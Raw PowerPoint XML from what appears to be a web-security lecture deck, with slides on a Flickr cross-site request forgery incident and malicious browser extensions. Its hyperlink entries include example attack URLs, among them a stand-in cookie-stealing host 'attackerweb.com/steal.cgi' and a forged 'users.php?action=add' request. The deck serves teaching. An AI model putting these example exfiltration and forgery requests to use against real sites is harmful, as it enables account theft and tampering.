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1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26" r:id="rId49"/>
    <p:sldId id="327" r:id="rId50"/>
    <p:sldId id="328" r:id="rId51"/>
    <p:sldId id="329" r:id="rId52"/>
    <p:sldId id="330" r:id="rId53"/>
    <p:sldId id="331" r:id="rId54"/>
    <p:sldId id="332" r:id="rId55"/>
    <p:sldId id="333" r:id="rId56"/>
    <p:sldId id="334" r:id="rId57"/>
    <p:sldId id="335" r:id="rId58"/>
    <p:sldId id="336" r:id="rId59"/>
    <p:sldId id="337" r:id="rId60"/>
    <p:sldId id="338" r:id="rId61"/>
    <p:sldId id="339" r:id="rId62"/>
    <p:sldId id="340" r:id="rId63"/>
    <p:sldId id="341" r:id="rId64"/>
    <p:sldId id="342" r:id="rId65"/>
    <p:sldId id="343" r:id="rId66"/>
    <p:sldId id="344" r:id="rId67"/>
    <p:sldId id="345" r:id="rId68"/>
    <p:sldId id="346" r:id="rId69"/>
    <p:sldId id="347" r:id="rId70"/>
    <p:sldId id="348" r:id="rId71"/>
    <p:sldId id="349" r:id="rId72"/>
    <p:sldId id="350" r:id="rId73"/>
    <p:sldId id="351" r:id="rId74"/>
    <p:sldId id="352" r:id="rId75"/>
    <p:sldId id="353" r:id="rId76"/>
    <p:sldId id="354" r:id="rId77"/>
    <p:sldId id="355" r:id="rId78"/>
    <p:sldId id="356" r:id="rId79"/>
    <p:sldId id="357" r:id="rId80"/>
    <p:sldId id="358" r:id="rId81"/>
    <p:sldId id="359" r:id="rId82"/>
    <p:sldId id="360" r:id="rId83"/>
    <p:sldId id="361" r:id="rId84"/>
    <p:sldId id="362" r:id="rId85"/>
    <p:sldId id="363" r:id="rId86"/>
    <p:sldId id="364" r:id="rId87"/>
    <p:sldId id="365" r:id="rId88"/>
    <p:sldId id="366" r:id="rId89"/>
    <p:sldId id="367" r:id="rId90"/>
    <p:sldId id="368" r:id="rId91"/>
    <p:sldId id="369" r:id="rId92"/>
    <p:sldId id="370" r:id="rId93"/>
  </p:sldIdLst>
  <p:sldSz cx="10058400" cy="7772400"/>
  <p:notesSz cx="10058400" cy="7772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758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65508" y="457200"/>
            <a:ext cx="913569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293873" y="616711"/>
            <a:ext cx="5470652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4352544"/>
            <a:ext cx="7040880" cy="1943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FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia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FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="109855">
              <a:lnSpc>
                <a:spcPts val="142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04617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FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constant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FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia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FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="109855">
              <a:lnSpc>
                <a:spcPts val="142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65508" y="457200"/>
            <a:ext cx="913569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04617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1787652"/>
            <a:ext cx="4375404" cy="51297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FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia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FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="109855">
              <a:lnSpc>
                <a:spcPts val="142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04617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FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia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FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="109855">
              <a:lnSpc>
                <a:spcPts val="142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57200" y="45720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457200" y="457200"/>
            <a:ext cx="9143999" cy="27142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FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia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FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="109855">
              <a:lnSpc>
                <a:spcPts val="142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65508" y="457200"/>
            <a:ext cx="913569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2925" y="433832"/>
            <a:ext cx="8972549" cy="1000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04617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54405" y="1918208"/>
            <a:ext cx="8149589" cy="2512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FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constanti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72516" y="6801822"/>
            <a:ext cx="1052195" cy="2019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FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle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7228332"/>
            <a:ext cx="2313432" cy="388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10/6/2018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925052" y="6805633"/>
            <a:ext cx="304800" cy="1962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FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="109855">
              <a:lnSpc>
                <a:spcPts val="1425"/>
              </a:lnSpc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hyperlink" Target="http://thehackernews.com/2014/08/f" TargetMode="External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jpg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5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g"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.trendmicro.com/trendlabs" TargetMode="External"/><Relationship Id="rId4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hyperlink" Target="http://www.webappsec.org/projects/whid/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svdb.org/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/" TargetMode="External"/><Relationship Id="rId4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gotocode.com/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image54.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image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6.jpg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openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.internetlivestats.com/watch/websites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7.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image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6.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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g"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image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5.jp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sourceforge.net/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image64.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image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6.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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7.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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9.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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ttackerweb.com/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image67.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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attackerweb.com/steal.cgi" TargetMode="Externa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hyperlink" Target="http://www.xyz.com/users.php?x=0&amp;amp;action=add&amp;amp;name=joe" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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xyz.com/users.php" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image85.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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xyz.com/users.php?x=0" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image87.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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g"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://info.cenzic.com/rs/cenzic/images/Cenzic" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.jp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tocode.com/apps.asp?app_id=3" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Cross" TargetMode="External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oc.bughunter.net/format" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://insecure.org/stf/smashstack.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.jpg"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://jspblog.sourceforge.net/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xyz.com/login.php?name" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.xyz.com/login.php?name=john&amp;amp;pwd=secret" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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2.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image24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hyperlink" Target="http://info.cenzic.com/rs/cenzic/images/Cenzic" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.jp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png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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xyz.come/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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8.pn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info.cenzic.com/rs/cenzic/images/Cenzic" TargetMode="Externa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jpg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image110.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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facebook.com/plugins/like.php?href" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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facebook.com/plugins/like.php?href" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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4.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.macromedia.com/support/documentation/en/f" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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facebook.com/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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facebook.com/?v" TargetMode="Externa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heregister.co.uk/2008/01/21/riaa_hacktivism/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image28.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.jp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facebook.com/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.xyz.com/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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example.com/dir/other.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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0.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image122.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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27.jp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4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jpg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image128.jp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uilderau.com.au/news/soa/XSS" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image31.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.jp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jpg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image130.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.jpg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3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image135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jpg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image133.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.jpg"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image137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0.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image139.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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2.jpg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dislikenew.doweb.fr/get2.php)" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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22.png"/><Relationship Id="rId7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untermeasures.trendmicro.eu/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.eu2010.es/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.jp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6.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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8700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330450" y="654811"/>
            <a:ext cx="539940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Example </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>incident: </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-15" dirty="0"/>
              <a:t>Profile</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="65" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>change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374856" y="4361942"/>
            <a:ext cx="7404734" cy="22523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25" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Flickr, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>one </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>biggest </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>online </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>photo management </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>and sharing </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>website </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>in  </a:t>
            </a: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10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world</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5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was</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5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impacted</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="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by</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-105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web</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10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application</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-75" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>vulnerability,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5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which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could</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-45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allow  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>an </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>attacker to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>modify </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>users’ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>profile</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-31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image</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>.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50">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="67945" indent="-635">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pP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9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site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was</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10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vulnerable</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-8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to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-6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5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most</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-8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common</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-6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vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-6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known</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-7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as</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-45" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia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Cross‐  Site</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5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Request</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-4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spc="-35" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Forgery</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-35" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5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which</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5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is</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-9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very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easy</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-7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to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-9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exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5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by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attackers.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300">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="31750">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Source:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="10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600" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://thehackernews.com/2014/08/f</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>lickr‐cross‐site‐request‐forgery.html</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constanti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552955" y="1562100"/>
            <a:ext cx="6953250" cy="24765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9855">
              <a:lnSpc>
                <a:spcPts val="1425"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{81D60167-4931-47E6-BA6A-407CBD079E47}" type="slidenum">
              <a:rPr dirty="0"/>
              <a:t>10</a:t>
            </a:fld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231389" y="654811"/>
            <a:ext cx="559752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Browser </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>vulnerabilities:</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-15" dirty="0"/>
              <a:t> extension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298702" y="6141211"/>
            <a:ext cx="742759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solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>https://community.qualys.com/blogs/laws‐of‐vulnerabilities/2013/11/27/secure‐your‐  browser‐before‐shopping‐online</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constant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83461" y="4971542"/>
            <a:ext cx="65779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55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larger</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-114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part</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-9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of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="2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8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problems</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10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are</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10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contributed</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-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by</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-6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8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plug‐ins</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-8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and  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>extensions</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-6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that</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-105" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-8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use</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-7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to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extend</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-3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10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capabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-8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of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>our</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-7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browsers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178040" y="1520951"/>
            <a:ext cx="1762505" cy="141351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752600" y="1752600"/>
            <a:ext cx="5343905" cy="292227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033762" y="6805633"/>
            <a:ext cx="172085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z="1200" spc="-95" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>11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333498" y="654811"/>
            <a:ext cx="539242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Browser </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>vulnerabilities:</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-40" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-15" dirty="0"/>
              <a:t>Example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70102" y="6100826"/>
            <a:ext cx="731393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solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://blog.trendmicro.com/trendlabs</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>‐security‐intelligence/an‐in‐depth‐look‐into‐  malicious‐browser‐extensions/</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constant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17702" y="1697990"/>
            <a:ext cx="7324090" cy="3042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onstantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10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extensions</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5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lead</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-3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to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-85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system</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-4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infection</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-6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and</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-35" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia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unwanted</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5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FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>spamming</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5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on  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Facebook</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>.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Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Affected </a:t>
            </a:r>
            <a:r>
